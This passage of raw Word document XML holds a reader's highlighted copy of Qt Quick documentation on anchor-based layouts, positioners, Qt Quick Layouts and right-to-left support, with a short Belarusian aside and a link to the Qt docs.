          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick provides anchors as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a top-level concept</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2295" w:history="1">
        <w:r w:rsidRPr="00C50BB7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>positioning with anchors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchor-based layouts are generally</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>far more performant than binding-based layouts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if pristine. A "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pristine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" anchor layout is one which uses only anchors (with object nesting) to determine the positioning, whereas a "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contaminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" anchor layout is one which uses both anchoring and bindings (either on position-related [x,y] properties or on dimension-related [width,height] properties) to determine the position.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1948" w:name="_Toc483000952"/>
      <w:bookmarkStart w:id="1949" w:name="_Toc483003943"/>
      <w:bookmarkStart w:id="1950" w:name="_Toc483604295"/>
      <w:bookmarkStart w:id="1951" w:name="_Toc483605515"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioners</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1948"/>
      <w:bookmarkEnd w:id="1949"/>
      <w:bookmarkEnd w:id="1950"/>
      <w:bookmarkEnd w:id="1951"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick also provides some </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>built-in positioner items</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For many use cases, the best positioner to use is a simple </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grid</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>row</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and Qt Quick provides items which will position children in these formations in the most efficient manner possible. See the documentation on</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2296" w:history="1">
        <w:r w:rsidRPr="00C50BB7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>item positioners types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about utilizing pre-defined positioners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00763869" w:rsidRDefault="00C50BB7" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1952" w:name="layouts"/>
      <w:bookmarkStart w:id="1953" w:name="_Toc483000953"/>
      <w:bookmarkStart w:id="1954" w:name="_Toc483003944"/>
      <w:bookmarkStart w:id="1955" w:name="_Toc483604296"/>
      <w:bookmarkStart w:id="1956" w:name="_Toc483605516"/>
      <w:bookmarkEnd w:id="1952"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layouts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1953"/>
      <w:bookmarkEnd w:id="1954"/>
      <w:bookmarkEnd w:id="1955"/>
      <w:bookmarkEnd w:id="1956"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>From Qt 5.1, the module</w:t>
      </w:r>
      <w:r w:rsidR="00763869">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2297" w:history="1">
        <w:r w:rsidRPr="00763869">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00763869">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can also be used to arrange Qt Quick items in a user interface. Unlike positioners, the types in Qt Quick Layouts </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">manage both the positions and sizes </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of items in a declarative interface. They are well suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resizable user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1957" w:name="right-to-left-support"/>
      <w:bookmarkStart w:id="1958" w:name="_Toc483000954"/>
      <w:bookmarkStart w:id="1959" w:name="_Toc483003945"/>
      <w:bookmarkStart w:id="1960" w:name="_Toc483604297"/>
      <w:bookmarkStart w:id="1961" w:name="_Toc483605517"/>
      <w:bookmarkEnd w:id="1957"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Right-To-Left Support</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1958"/>
      <w:bookmarkEnd w:id="1959"/>
      <w:bookmarkEnd w:id="1960"/>
      <w:bookmarkEnd w:id="1961"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The directionality of the written form of a language often has a great impact on how the visual types of a user-interface should be positioned. Qt Quick supports right-to-left positioning of types through the predefined-layouts as well as </w:t>
      </w:r>
      <w:r w:rsidRPr="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>right-to-left text layouts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00763869" w:rsidRPr="00763869" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2298" w:history="1">
        <w:r w:rsidRPr="00C50BB7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>right-to-left support in Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information on the topic.</w:t>
      </w:r>
      <w:r w:rsidR="00763869">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763869">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я гэта пакуль чытаць не буду, бо мне непатрэбна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00D1065E" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2299" w:history="1">
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>positioning</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00251D49" w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1962" w:name="_Toc483000955"/>
      <w:bookmarkStart w:id="1963" w:name="_Toc483003946"/>
      <w:bookmarkStart w:id="1964" w:name="_Toc483604298"/>
      <w:bookmarkStart w:id="1965" w:name="_Toc483605518"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioning with Anchors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1962"/>
      <w:bookmarkEnd w:id="1963"/>
      <w:bookmarkEnd w:id="1964"/>
      <w:bookmarkEnd w:id="1965"/>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In addition to</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the more traditional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2300" w:anchor="grid" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2301" w:anchor="row" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Row</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2302" w:anchor="column" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Column</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Qt Quick also provides a way to layout items using the concept of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
